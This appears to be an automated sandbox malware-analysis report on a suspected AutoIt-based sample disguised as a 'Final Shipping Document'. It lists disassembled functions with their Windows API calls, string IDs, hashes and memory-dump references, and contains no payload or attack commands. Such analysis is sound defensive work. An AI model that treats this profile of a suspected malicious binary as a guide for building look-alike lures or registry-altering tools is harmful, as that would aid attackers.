                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                            • String ID: 0
                                                            • API String ID: 2760611726-4108050209
                                                            • Opcode ID: 3092b9e54e4ee5d76bd7e05797f6096326d2d9330ee2dd4bc5eb03e5d1bb8caa
                                                            • Instruction ID: 790a1166e1859a0b586f60b957a8a288019c676a2b377dfbdb233cf8482447da
                                                            • Opcode Fuzzy Hash: 3092b9e54e4ee5d76bd7e05797f6096326d2d9330ee2dd4bc5eb03e5d1bb8caa
                                                            • Instruction Fuzzy Hash: FE12AD35200205DFDB25DF28C884BB9B7F5FB44310F1884A9FA899B261CB71EC96DB91
                                                            Function 00C22711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(00000000), ref: 00C2273E
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C2286A
                                                            • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00C228A9
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00C228B9
                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00C22900
                                                            • GetClientRect.USER32(00000000,?), ref: 00C2290C
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00C22955
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C22964
                                                            • GetStockObject.GDI32(00000011), ref: 00C22974
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00C22978
                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00C22988
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C22991
                                                            • DeleteDC.GDI32(00000000), ref: 00C2299A
                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C229C6
                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C229DD
                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00C22A1D
                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C22A31
                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C22A42
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00C22A77
                                                            • GetStockObject.GDI32(00000011), ref: 00C22A82
                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C22A8D
                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00C22A97
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-517079104
                                                            • Opcode ID: 5259453a481c0000c11837491c6764af6fad58ae3d28e2b03a1771b558b2c703
                                                            • Instruction ID: cb8c222c7c5131809b135746961c38c66b87a70e15164f491fe4c8daf6dae4cd
                                                            • Opcode Fuzzy Hash: 5259453a481c0000c11837491c6764af6fad58ae3d28e2b03a1771b558b2c703
                                                            • Instruction Fuzzy Hash: 87B15B71A50215AFEB14DF68DC8AFAE7BB9EB09710F048154F915E72A0DB74ED40CBA0
                                                            Function 00C14ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 00C14AED
                                                            • GetDriveTypeW.KERNEL32(?,00C3CB68,?,\\.\,00C3CC08), ref: 00C14BCA
                                                            • SetErrorMode.KERNEL32(00000000,00C3CB68,?,\\.\,00C3CC08), ref: 00C14D36
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                            • API String ID: 2907320926-4222207086
                                                            • Opcode ID: 57b4c045b1501a2743f8e3420ce2fcd51f30741f0536420e79846370cf403c62
                                                            • Instruction ID: 56c3de8e40159a8a9b0a22df85e0cbe10a3114e2ebdd552de4e068d2ebd8b569
                                                            • Opcode Fuzzy Hash: 57b4c045b1501a2743f8e3420ce2fcd51f30741f0536420e79846370cf403c62
                                                            • Instruction Fuzzy Hash: 1D61B370709105EBCB18DF25CAE1DEDB7A1EB47740B2484A5F806AB291DB35DE81FB81
                                                            Function 00C373E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColor.USER32(00000012), ref: 00C37421
                                                            • SetTextColor.GDI32(?,?), ref: 00C37425
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00C3743B
                                                            • GetSysColor.USER32(0000000F), ref: 00C37446
                                                            • CreateSolidBrush.GDI32(?), ref: 00C3744B
                                                            • GetSysColor.USER32(00000011), ref: 00C37463
                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C37471
                                                            • SelectObject.GDI32(?,00000000), ref: 00C37482
                                                            • SetBkColor.GDI32(?,00000000), ref: 00C3748B
                                                            • SelectObject.GDI32(?,?), ref: 00C37498
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00C374B7
                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C374CE
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00C374DB
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C3752A
                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C37554
                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00C37572
                                                            • DrawFocusRect.USER32(?,?), ref: 00C3757D
                                                            • GetSysColor.USER32(00000011), ref: 00C3758E
                                                            • SetTextColor.GDI32(?,00000000), ref: 00C37596
                                                            • DrawTextW.USER32(?,00C370F5,000000FF,?,00000000), ref: 00C375A8
                                                            • SelectObject.GDI32(?,?), ref: 00C375BF
                                                            • DeleteObject.GDI32(?), ref: 00C375CA
                                                            • SelectObject.GDI32(?,?), ref: 00C375D0
                                                            • DeleteObject.GDI32(?), ref: 00C375D5
                                                            • SetTextColor.GDI32(?,?), ref: 00C375DB
                                                            • SetBkColor.GDI32(?,?), ref: 00C375E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1996641542-0
                                                            • Opcode ID: c08c11dafe49dec78d70f73f63e01d4f18b82199acab54437bf9a5fe7351368a
                                                            • Instruction ID: d35e5c2ff13cb40909102dd618a18de5befe2a87a5f567be92ffd9d92905e41d
                                                            • Opcode Fuzzy Hash: c08c11dafe49dec78d70f73f63e01d4f18b82199acab54437bf9a5fe7351368a
                                                            • Instruction Fuzzy Hash: E1615D72910218AFDF119FA4DC89BEE7FB9EB08320F114215F915BB2A1D775A940DF90
                                                            Function 00C30FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 00C31128
                                                            • GetDesktopWindow.USER32 ref: 00C3113D
                                                            • GetWindowRect.USER32(00000000), ref: 00C31144
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C31199
                                                            • DestroyWindow.USER32(?), ref: 00C311B9
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C311ED
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C3120B
                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C3121D
                                                            • SendMessageW.USER32(00000000,00000421,?,?), ref: 00C31232
                                                            • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00C31245
                                                            • IsWindowVisible.USER32(00000000), ref: 00C312A1
                                                            • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00C312BC
                                                            • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00C312D0
                                                            • GetWindowRect.USER32(00000000,?), ref: 00C312E8
                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00C3130E
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00C31328
                                                            • CopyRect.USER32(?,?), ref: 00C3133F
                                                            • SendMessageW.USER32(00000000,00000412,00000000), ref: 00C313AA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                            • String ID: ($0$tooltips_class32
                                                            • API String ID: 698492251-4156429822
                                                            • Opcode ID: 476dcd323971419671ecc3b50e9e341793ffe8ce06cc54779d8ecc9dd49dfdb3
                                                            • Instruction ID: e6d9c4972b366d5adbedbbb57fc469153d87fe817718b4ec65444a05bf1f6cda
                                                            • Opcode Fuzzy Hash: 476dcd323971419671ecc3b50e9e341793ffe8ce06cc54779d8ecc9dd49dfdb3
                                                            • Instruction Fuzzy Hash: ACB19B71618341AFD704DF64C885BAEBBE4FF85310F04891CF999AB2A1CB31E944CB91
                                                            Function 00C30241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 00C302E5
                                                            • _wcslen.LIBCMT ref: 00C3031F
                                                            • _wcslen.LIBCMT ref: 00C30389
                                                            • _wcslen.LIBCMT ref: 00C303F1
                                                            • _wcslen.LIBCMT ref: 00C30475
                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C304C5
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C30504
                                                              • Part of subcall function 00BBF9F2: _wcslen.LIBCMT ref: 00BBF9FD
                                                              • Part of subcall function 00C0223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C02258
                                                              • Part of subcall function 00C0223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C0228A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                            • API String ID: 1103490817-719923060
                                                            • Opcode ID: 22957180cef18e82b594aa8b357e20b266065fbd4366b46fe8e5f498884b791f
                                                            • Instruction ID: 8f96447136b9f5b661a1fe8e163d89043c95e3f2fd745ebe6d19adfe252de25c
                                                            • Opcode Fuzzy Hash: 22957180cef18e82b594aa8b357e20b266065fbd4366b46fe8e5f498884b791f
                                                            • Instruction Fuzzy Hash: 5BE1B4322282019FC714DF24C4A197EB7E5BF98714F24495CF8A69B7A6D730EE45CB41
                                                            Function 00BB8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BB8968
                                                            • GetSystemMetrics.USER32(00000007), ref: 00BB8970
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BB899B
                                                            • GetSystemMetrics.USER32(00000008), ref: 00BB89A3
                                                            • GetSystemMetrics.USER32(00000004), ref: 00BB89C8
                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00BB89E5
                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BB89F5
                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00BB8A28
                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BB8A3C
                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00BB8A5A
                                                            • GetStockObject.GDI32(00000011), ref: 00BB8A76
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BB8A81
                                                              • Part of subcall function 00BB912D: GetCursorPos.USER32(?), ref: 00BB9141
                                                              • Part of subcall function 00BB912D: ScreenToClient.USER32(00000000,?), ref: 00BB915E
                                                              • Part of subcall function 00BB912D: GetAsyncKeyState.USER32(00000001), ref: 00BB9183
                                                              • Part of subcall function 00BB912D: GetAsyncKeyState.USER32(00000002), ref: 00BB919D
                                                            • SetTimer.USER32(00000000,00000000,00000028,00BB90FC), ref: 00BB8AA8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                            • String ID: AutoIt v3 GUI
                                                            • API String ID: 1458621304-248962490
                                                            • Opcode ID: b06a577f2a52a9e2cb8e372e886614d2a87d85fa65b6205c0f5aed8556a2e57d
                                                            • Instruction ID: e75b06b0fa50b38b278c4ef6c3422bcb54f8c9b832887e54a72af96a54a877c8
                                                            • Opcode Fuzzy Hash: b06a577f2a52a9e2cb8e372e886614d2a87d85fa65b6205c0f5aed8556a2e57d
                                                            • Instruction Fuzzy Hash: B9B13675A0020AAFDF14DFA8DC85BBE3BF5EB48314F144269FE19A7290DB74A841CB51
                                                            Function 00C00D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00C010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C01114
                                                              • Part of subcall function 00C010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01120
                                                              • Part of subcall function 00C010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C0112F
                                                              • Part of subcall function 00C010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01136
                                                              • Part of subcall function 00C010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C0114D
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C00DF5
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C00E29
                                                            • GetLengthSid.ADVAPI32(?), ref: 00C00E40
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00C00E7A
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C00E96
                                                            • GetLengthSid.ADVAPI32(?), ref: 00C00EAD
                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C00EB5
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00C00EBC
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C00EDD
                                                            • CopySid.ADVAPI32(00000000), ref: 00C00EE4
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C00F13
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C00F35
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C00F47
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00F6E
                                                            • HeapFree.KERNEL32(00000000), ref: 00C00F75
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00F7E
                                                            • HeapFree.KERNEL32(00000000), ref: 00C00F85
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00F8E
                                                            • HeapFree.KERNEL32(00000000), ref: 00C00F95
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00C00FA1
                                                            • HeapFree.KERNEL32(00000000), ref: 00C00FA8
                                                              • Part of subcall function 00C01193: GetProcessHeap.KERNEL32(00000008,00C00BB1,?,00000000,?,00C00BB1,?), ref: 00C011A1
                                                              • Part of subcall function 00C01193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C00BB1,?), ref: 00C011A8
                                                              • Part of subcall function 00C01193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C00BB1,?), ref: 00C011B7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                            • String ID:
                                                            • API String ID: 4175595110-0
                                                            • Opcode ID: 03bbf9fb776f00509f86d0f3de828a6875590cdaddb44079167765916421d22b
                                                            • Instruction ID: 0b47de9634c620b06575eae1293e1a23abf76ef26ab9e1f3c1ae081a716b0c55
                                                            • Opcode Fuzzy Hash: 03bbf9fb776f00509f86d0f3de828a6875590cdaddb44079167765916421d22b
                                                            • Instruction Fuzzy Hash: DD716A7290020AABDF20DFA4DC89FAEBBB8BF05301F254115FA69B6191D7319A15DB60
                                                            Function 00C2C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2C4BD
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00C3CC08,00000000,?,00000000,?,?), ref: 00C2C544
                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00C2C5A4
                                                            • _wcslen.LIBCMT ref: 00C2C5F4
                                                            • _wcslen.LIBCMT ref: 00C2C66F
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00C2C6B2
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00C2C7C1
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00C2C84D
                                                            • RegCloseKey.ADVAPI32(?), ref: 00C2C881
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C2C88E
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00C2C960
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 9721498-966354055
                                                            • Opcode ID: a4520c1812f779258e492a7f292cc192d692a5d8e2960b13618ac403cbc52774
                                                            • Instruction ID: 110c80bf7668785137f4ef1412ac7170cc2a91d4a9a914954c28be1d465d8664
                                                            • Opcode Fuzzy Hash: a4520c1812f779258e492a7f292cc192d692a5d8e2960b13618ac403cbc52774
                                                            • Instruction Fuzzy Hash: 6D1268356082119FCB14EF14D891B2EB7E5EF89714F04889DF89A9B7A2DB31ED41CB81
                                                            Function 00C3091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 00C309C6
                                                            • _wcslen.LIBCMT ref: 00C30A01
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C30A54
                                                            • _wcslen.LIBCMT ref: 00C30A8A
                                                            • _wcslen.LIBCMT ref: 00C30B06
                                                            • _wcslen.LIBCMT ref: 00C30B81
                                                              • Part of subcall function 00BBF9F2: _wcslen.LIBCMT ref: 00BBF9FD
                                                              • Part of subcall function 00C02BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C02BFA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                            • API String ID: 1103490817-4258414348
                                                            • Opcode ID: 5b9b73527012c06a2f3cabc3145765cb39f9a467f54cdd3a8ed3fdad194766c1
                                                            • Instruction ID: b028082f003ceba19b6eb18301c30a7a76288cf39846e790836cec07c3be7201
                                                            • Opcode Fuzzy Hash: 5b9b73527012c06a2f3cabc3145765cb39f9a467f54cdd3a8ed3fdad194766c1
                                                            • Instruction Fuzzy Hash: 93E1B4322183018FC714DF25C4A196AB7E1FF95718F24499DF8A69B3A2D731EE45CB81
                                                            Function 00C2C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
